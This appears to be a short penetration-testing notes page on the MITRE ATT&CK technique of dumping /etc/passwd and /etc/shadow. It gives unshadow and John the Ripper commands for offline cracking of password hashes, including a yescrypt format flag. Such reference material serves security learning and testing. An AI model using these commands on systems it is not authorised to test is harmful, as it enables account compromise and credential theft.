Shadow File

MITRE ATT&CK™ OS Credential Dumping: /etc/passwd and /etc/shadow - Technique T1003.008

Theory

We may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow.

By default, /etc/shadow is only readable by the root user

Practice

If we can access /etc/passwd and /etc/shadow as well, we can crack user passwords using unshadow and John The Ripper.

We can use the unshadow command to combined the /etc/passwd and /etc/shadow files

unshadow passwd.txt shadow.txt > passwords.txt

Then, we can crack the hashes using john.

john --wordlist=wordlist.txt passwords.txt

# If the hash in /etc/shadow contains the $y$ prefix, specify the hash format to "crypt".
# btw, $ye$ is the scheme of the yescrypt.
john --format=crypt --wordlist=wordlist.txt passwords.txt

Resources

OS Credential Dumping: /etc/passwd and /etc/shadow, Sub-technique T1003.008 - Enterprise | MITRE ATT&CK®

Linux Privilege Escalation | Exploit Noteshideckies

Last updated 4 months ago